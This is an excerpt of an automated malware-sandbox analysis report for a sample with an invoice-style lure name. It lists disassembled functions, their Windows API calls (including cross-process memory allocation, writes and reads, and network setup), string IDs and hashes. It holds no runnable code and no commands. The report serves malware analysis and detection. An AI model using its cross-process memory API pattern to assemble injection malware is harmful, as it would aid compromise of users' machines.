                                              • Opcode ID: 8b9a38ee90449f2d765ba8b56296e8c72e5a42a5b9e76d24a06a4cace541728d
                                              • Instruction ID: 4b1b9997d9eae5f14beaec69677e12fb96e00e5c46f2e26279652efdd8cc30f4
                                              • Opcode Fuzzy Hash: 8b9a38ee90449f2d765ba8b56296e8c72e5a42a5b9e76d24a06a4cace541728d
                                              • Instruction Fuzzy Hash: 63212632340208BFEF219E64DC82FEE736AEB54760F110519F950EB1D1DBB1ACA087A0
                                              Function 00139707 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00139720
                                                • Part of subcall function 001418EE: GetWindowThreadProcessId.USER32(?,?), ref: 00141919
                                                • Part of subcall function 001418EE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0013973C,00000034,?,?,00001004,00000000,00000000), ref: 00141929
                                                • Part of subcall function 001418EE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0013973C,00000034,?,?,00001004,00000000,00000000), ref: 0014193F
                                                • Part of subcall function 001419CC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00139778,?,?,00000034,00000800,?,00000034), ref: 001419F6
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00139787
                                                • Part of subcall function 00141997: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001397A7,?,?,00000800,?,00001073,00000000,?,?), ref: 001419C1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Process$MemoryMessageSend$AllocOpenReadThreadVirtualWindowWrite
                                              • String ID: @U=u
                                              • API String ID: 1045663743-2594219639
                                              • Opcode ID: af3b12d21ffcf43a732966afcf08658c89751e86cedda69dcb0c3836c7fb52ce
                                              • Instruction ID: 8cdeaeaddfed57480fb13eb93f5c2c01729c2790cf4e1fa54c00e42e639a6181
                                              • Opcode Fuzzy Hash: af3b12d21ffcf43a732966afcf08658c89751e86cedda69dcb0c3836c7fb52ce
                                              • Instruction Fuzzy Hash: BE214C31901129ABEF11ABA4DC41FDDBBB8FF18350F1001A5F554A71A1DB715A84DFA0
                                              Function 00166943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 001669D0
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001669DB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: Combobox
                                              • API String ID: 3850602802-2096851135
                                              • Opcode ID: 8aba97e581a12bb4e587f3817d9bd3d16009f79bdfdf49be3692383d4c867a1a
                                              • Instruction ID: 9de7a8fc59c17aeb9391522e0c45384c82154de36ec270422fca03c14463e940
                                              • Opcode Fuzzy Hash: 8aba97e581a12bb4e587f3817d9bd3d16009f79bdfdf49be3692383d4c867a1a
                                              • Instruction Fuzzy Hash: B411B2716042086FEF159E64DC80EFB3B6AEB993A8F110128FD5897291D7759CA187A0
                                              Function 00169962 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @U=u
                                              • API String ID: 0-2594219639
                                              • Opcode ID: 39b748c5d7a6ab81724c0fb13bc8f92986a4dec31c7b45f36d082f4d24d2b8e1
                                              • Instruction ID: 33d4bb8da01ced06aaa23c5ade9a1973826ec539578a1a35e9b0a638b05ecdd3
                                              • Opcode Fuzzy Hash: 39b748c5d7a6ab81724c0fb13bc8f92986a4dec31c7b45f36d082f4d24d2b8e1
                                              • Instruction Fuzzy Hash: 5B219D71204248BFEB148F94CC41FBA37A8EB09355F014159FA22EB1E1C770D961EB60
                                              Function 00166E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000E1D73
                                                • Part of subcall function 000E1D35: GetStockObject.GDI32(00000011), ref: 000E1D87
                                                • Part of subcall function 000E1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 000E1D91
                                              • GetWindowRect.USER32(00000000,?), ref: 00166EE0
                                              • GetSysColor.USER32(00000012), ref: 00166EFA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                              • String ID: static
                                              • API String ID: 1983116058-2160076837
                                              • Opcode ID: 11f687b22307829cf7277a146f5aac1b15c0338805eb2ceed1a764310ec5a10f
                                              • Instruction ID: 435c4cffed7f3c5258038fcbb26c4a81e608deb4ec89655e88283ad82e575812
                                              • Opcode Fuzzy Hash: 11f687b22307829cf7277a146f5aac1b15c0338805eb2ceed1a764310ec5a10f
                                              • Instruction Fuzzy Hash: B921677261020AAFDB04DFA8DC45AFA7BB8FB08314F004628FD55E3250E775E861DB60
                                              Function 00142E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00142F11
                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00142F30
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: InfoItemMenu_memset
                                              • String ID: 0
                                              • API String ID: 2223754486-4108050209
                                              • Opcode ID: 8d2c69604dc403fc38fa74c908ca89161ff7b8742f0fe2b20e723a3c32b94267
                                              • Instruction ID: 7062f84441742f06e34ecb6ed15fa8d5478b646125fab1e52d569b0ecb3d8a62
                                              • Opcode Fuzzy Hash: 8d2c69604dc403fc38fa74c908ca89161ff7b8742f0fe2b20e723a3c32b94267
                                              • Instruction Fuzzy Hash: 6911C432901214ABDB24DB98DC44B9977B9EB26310F9900B5F855F72B0DBB0ED88C791
                                              Function 001524CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00152520
                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00152549
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Internet$OpenOption
                                              • String ID: <local>
                                              • API String ID: 942729171-4266983199
                                              • Opcode ID: 2e150bde48352a3de542ccaf1c141aec7de34e5deadab29e5ef316ecaf7cd20e
                                              • Instruction ID: 9da08d5962470cd309e9a04696ec132258df7a970d26a887bcb4d5d609e4e02f
                                              • Opcode Fuzzy Hash: 2e150bde48352a3de542ccaf1c141aec7de34e5deadab29e5ef316ecaf7cd20e
                                              • Instruction Fuzzy Hash: C111C172500225FADB288F518C98EFBFF68FB06352F10812AF9654A040E3705989D6E0
                                              Function 00168752 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,?,?,?), ref: 0016879F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: @U=u
                                              • API String ID: 3850602802-2594219639
                                              • Opcode ID: 53b0c6dcec5fee942e0fafca3d3bf2d8123ad6e18ac5d8cf90f03fea97b4439a
                                              • Instruction ID: ad567d71cf00e22d3fb91a67d04aa104c164284ddde60bcb67f7f1d1699f0e64
                                              • Opcode Fuzzy Hash: 53b0c6dcec5fee942e0fafca3d3bf2d8123ad6e18ac5d8cf90f03fea97b4439a
                                              • Instruction Fuzzy Hash: 3B21E77A604109EF8B15DF94DC408EA7BB5FB4D340B114258FE15A3360DB31AD61DBA0
                                              Function 00166825 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,00000401,?,00000000), ref: 0016689B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: @U=u$button
                                              • API String ID: 3850602802-1762282863
                                              • Opcode ID: 20cb5fb52d6f3ec5f600ced97dc3affeca916624c2b1b3d53867b43fb26e7481
                                              • Instruction ID: f782c9999c50f9e5461e44509204e9321c2b98963b089e636b4f8e7f1b836fbd
                                              • Opcode Fuzzy Hash: 20cb5fb52d6f3ec5f600ced97dc3affeca916624c2b1b3d53867b43fb26e7481
                                              • Instruction Fuzzy Hash: 2B110032150209ABDF018FB0DC41FEA376EFF18314F110218FEA0A71A0C772E8A1AB60
                                              Function 00167AFB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,0000133E,00000000,?), ref: 00167B47
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: @U=u
                                              • API String ID: 3850602802-2594219639
                                              • Opcode ID: f8a7e6f38db1589475f2daa6597fe692e13b695cc35865bb3dc7160b65832b54
                                              • Instruction ID: f297006d28ff4fe06f05f0985eb0f538dc76166136a51a9f5f7fc4081c2d44ca
                                              • Opcode Fuzzy Hash: f8a7e6f38db1589475f2daa6597fe692e13b695cc35865bb3dc7160b65832b54
                                              • Instruction Fuzzy Hash: 2E11DD70508348AFDB20DF74CCA1AE7BBE8FF06314F10891DE9AA97291DB7169519B60
                                              Function 001580A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0015830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,001580C8,?,00000000,?,?), ref: 00158322
                                              • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001580CB
                                              • htons.WSOCK32(00000000,?,00000000), ref: 00158108
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWidehtonsinet_addr
                                              • String ID: 255.255.255.255
                                              • API String ID: 2496851823-2422070025
                                              • Opcode ID: 17df73d6494a1f8277717f9ec976dca1f14dae949a0a4c29a65a7070d2b5a776
                                              • Instruction ID: cf5814ed4094ae65145cb7cff07a8cde6ea1f5fad46c4101ce799a47d4f66838
                                              • Opcode Fuzzy Hash: 17df73d6494a1f8277717f9ec976dca1f14dae949a0a4c29a65a7070d2b5a776
                                              • Instruction Fuzzy Hash: 2C118E74600205EBDB20AF64DC86BBDB364FF14325F10852AFD21AB292DB72A8198795
                                              Function 00139989 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 001419CC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00139778,?,?,00000034,00000800,?,00000034), ref: 001419F6
                                              • SendMessageW.USER32(?,0000102B,?,00000000), ref: 001399EB
                                              • SendMessageW.USER32(?,0000102B,?,00000000), ref: 00139A10
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$MemoryProcessWrite
                                              • String ID: @U=u
                                              • API String ID: 1195347164-2594219639
                                              • Opcode ID: f333419ab03fa33cf8099e3af2b3f8b412f874067bc21c80ed47dd998a48e4a6
                                              • Instruction ID: 79c4530e3a5be7292c504efaa48294a30af3a4f6c815b716a9bf9a9430761509
                                              • Opcode Fuzzy Hash: f333419ab03fa33cf8099e3af2b3f8b412f874067bc21c80ed47dd998a48e4a6
                                              • Instruction Fuzzy Hash: 8C014E72900218EBDB20AF68DC46FFEBB78DB14320F00016AF911A70D1DBB15D94CB60
                                              Function 00139AB7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,00000406,00000000,00000000), ref: 00139ADD
                                              • SendMessageW.USER32(?,0000040D,?,00000000), ref: 00139B10
                                                • Part of subcall function 00141997: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001397A7,?,?,00000800,?,00001073,00000000,?,?), ref: 001419C1
                                                • Part of subcall function 000E7D2C: _memmove.LIBCMT ref: 000E7D66
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$MemoryProcessRead_memmove
                                              • String ID: @U=u
                                              • API String ID: 339422723-2594219639
                                              • Opcode ID: 678e23275a437fb5f50f00a852b8b5eb8a8be3f0fdc77deea0b80068f44b58fe
                                              • Instruction ID: 00546a70981c0f53bca5202622702a93735d1a9230191585c4ff1c7bf41b8ea0
                                              • Opcode Fuzzy Hash: 678e23275a437fb5f50f00a852b8b5eb8a8be3f0fdc77deea0b80068f44b58fe
                                              • Instruction Fuzzy Hash: B1016D71901118AFDB50EF60DC81EE977BCFB24350F4080AAFA89A6161DE714E99DF90
                                              Function 0016C86D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E2612: GetWindowLongW.USER32(?,000000EB), ref: 000E2623
                                              • DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,0011BB8A,?,?,?), ref: 0016C8E1
                                                • Part of subcall function 000E25DB: GetWindowLongW.USER32(?,000000EB), ref: 000E25EC
                                              • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0016C8C7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: LongWindow$MessageProcSend
                                              • String ID: @U=u
                                              • API String ID: 982171247-2594219639
                                              • Opcode ID: 08971e63078573d7a104d335fce8947be524feb655499764841863e3d3cc2d4e
                                              • Instruction ID: 91ff123d7b6bd60e9be15deff028832f0b8351229c73a0ab7f3592ee823c5598
                                              • Opcode Fuzzy Hash: 08971e63078573d7a104d335fce8947be524feb655499764841863e3d3cc2d4e
                                              • Instruction Fuzzy Hash: 9101D831200214AFCB315F14DC44E763BAEFF89324F140128F9661B6E1C7716862EB91
                                              Function 00139A1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00139A2E
                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00139A46
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: @U=u
                                              • API String ID: 3850602802-2594219639
                                              • Opcode ID: b6871e26464920e7ff118b0b1bd9b09a91597845f591de9c9b52ee10606e3ddb
                                              • Instruction ID: 2fd806d5908b6b5c17fcc3c3b9b56e064a42848ec8b0bcf92f83cedb75395379
                                              • Opcode Fuzzy Hash: b6871e26464920e7ff118b0b1bd9b09a91597845f591de9c9b52ee10606e3ddb
                                              • Instruction Fuzzy Hash: 13E09235342361B6F63056259C8EFD77F59DB99B61F120139FB41AA1E1CBD24C8282B0
                                              Function 0013A1A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0013A1BA
                                              • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 0013A1EA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: @U=u
                                              • API String ID: 3850602802-2594219639
                                              • Opcode ID: e93b495025e80be5b55ce69494f3e639efd5be2cdde003b5770c5fcd807fc634
                                              • Instruction ID: f1ee2e3040ce32c49461b93099b86dbfcad24ef86cf8511dbba2c8d720386d1a
                                              • Opcode Fuzzy Hash: e93b495025e80be5b55ce69494f3e639efd5be2cdde003b5770c5fcd807fc634
                                              • Instruction Fuzzy Hash: 73F0A075244304BFEB166AA0EC86FEA3B1DEF18BA1F010028F7455A0E1DAE25C9097A0
                                              Function 0013A327 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00139E2E: SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00139E47
                                                • Part of subcall function 00139E2E: SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00139E81
                                              • SendMessageW.USER32(?,0000110B,00000005,00000000), ref: 0013A34B
                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0013A35B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: @U=u
                                              • API String ID: 3850602802-2594219639
                                              • Opcode ID: c67886674636b92828d7dbb16ebd11e3297922445049c234e7534e7a078af081
                                              • Instruction ID: d700310a66d99aa988afddb6dce7c5d3031e360854a8381c8f2653312a4415fe
                                              • Opcode Fuzzy Hash: c67886674636b92828d7dbb16ebd11e3297922445049c234e7534e7a078af081
